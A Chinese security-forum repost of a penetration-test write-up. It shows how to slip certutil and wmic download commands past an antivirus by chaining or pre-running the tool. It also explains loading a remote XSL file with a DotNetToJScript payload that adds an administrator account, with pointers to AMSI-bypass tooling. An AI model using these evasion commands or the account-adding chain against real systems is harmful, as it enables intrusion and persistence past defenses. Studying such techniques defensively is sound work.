安全矩阵

 找回密码
 立即注册
搜索
查看: 6581|回复: 0

记一次渗透测试后引发的小扩展

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-12-5 08:27:37 | 显示全部楼层 |阅读模式
原文链接:记一次渗透测试后引发的小扩展

背景

在一次授权的渗透测试中,由于使用客户提供的机器进行测试操作,一开始通过弱口令的爆破+上传文件拿到shell,但是由于客户要求点到为止就没有深入进行,但是发现了安全软件为某杀软,突然心血来潮想要执行远程下载文件还是受到了拦截,以下是对遇到的场景后期搭建环境进行实现的一些小拓展,仅供参考~~~

正文
安装某杀软并更新至最新版本,并检查防护中心为全开启的状态,随后在cmd命令行下使用certutil时候,发生如下拦截:


在尝试了一些变形之后下之后发现了如下可以绕过的语句。
发现使用&和|也可以顺利绕过并下载。当然后续要想实现上线需要对该exe做免杀处理,这里只是分享绕过下载的方式,相信免杀的绕过对于各位大佬来说也不是什么难事~~~
  1. Certutil & Certutil –urlcache –f –split url

  2. Certutil | Certutil –urlcache –f –split url
复制代码



经过后续的测试发现也可以先执行一次certutil再执行原始的下载语句即可绕过,便可以看到2.exe已经被下载。

其实想想使用的符号&和|,本质都是执行了2次certutil~
Wmic方式可以看到一开始也是被拦截,如下所示:

在后续的测试变形中发现先执行wmic os,然后执行正常的命令即可绕过,如下所示:


对于wmic的绕过也可以先执行wmic然后exit退出,然后继续执行原始的下载命令即可,当然wmic也有其他方式可以进行绕过这里不展开介绍。

小扩展
下面介绍一个小的利用方式添加用户,其余白名单执行和利用方式可以自行研究~。这种调用的方式最早应该是由Casey Smith@subTee大佬分享一个技巧,利用wmic从本地或者远程调用xsl的方式来执行携带有payload的xsl文件。
首先net user查看用户只有2个用户如下:


首先执行wmic os。

然后再次执行wmic os get下载命令即可成功添加,此时未有拦截,如下所示:


当然,添加用户到到管理员组需要管理员权限,所以我在这里用了本地的管理员进行的执行,脚本主要是调用了windows的2个api函数进行创建用户和添加管理员组,分别为:
  1. NetUserAdd //添加用户

  2. NetLocalGroupAddMembers //添加用户到管理员
复制代码

可能有人会问到xsl文件怎么执行的添加用户到管理员,因为这个整个流程是先将添加用户的c#脚本先转化为dll文件,然后使用DotNetToJScript将该dll文件转为为js,最后将转化为的js文件放在要落地执行的xsl文件里面。对于c#语言或者c++语言调用windows api添加用户至管理员组网上已经有很多代码,拿过来改改就行。然后使用Visual Studio的开发者工具将c#文件转化为dll文件。

语法:csc /target:library /out:输出文件 待转化的c#文件

然后使用DotNetToJScript将文件转化为js脚本文件(DotNetToJScript这个工具是由17年James Forshaw开源了一个工具DotNetToJScript,能够利用JS、Vbs等脚本加载.Net程序。)转化语法也比较简单。如下所示:

可以看出直接DotNetToJScript –o 待输出js文件 待转化文件。(但是该工具不能够绕过windwos 的amsi检测机制,如果要想绕过该防护可以使用另外一个工具GadgetToJScript(https://github.com/med0x2e/GadgetToJScript
来看下DotNetToJScript工具转化后的js文件如下图所示:


处理流程大概是就是js通过调用一些windwos api的函数来对前面base64编码过后的代码进行解码,然后解码过后进行反序列化操作,因为工具是先序列化然后再base64编码。最后把文件写入xsl文件定义为Jscript语言,借助.net环境来实现代码功能。绕过之后貌似不再拦截原始的下载命令,但是需要退出该杀软才可以再次拦截原始的certutil或者wmic命令,(有的时候即使退出再重新开启也不会拦截)即使再次进入拦截,通过上述方法继续可以执行下载。
对于调用windows api绕过部分杀软添加管理员也是老生常谈了,也可以修改为接收参数的方式进行,把写好的文件编译为exe即可使用,相信聪明的你应该知道怎么做了~~~

绕过并添加到管理员组:



总结
遇到杀软不要害怕,要对当前的利用场景进行分析,有条件的可以搭建环境测试一下,结合之前前辈们提出的利用方式进行思维发散,总之站在巨人的肩膀上还是有不少收获的。
参考文章:

  1. [https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/](https://3gstudent.github.io/3gstudent.github.io/利用wmic调用xsl文件的分析与利用/)

  2. https://www.cnblogs.com/zpchcbd/p/11915654.html
复制代码














回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:37 , Processed in 0.012885 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表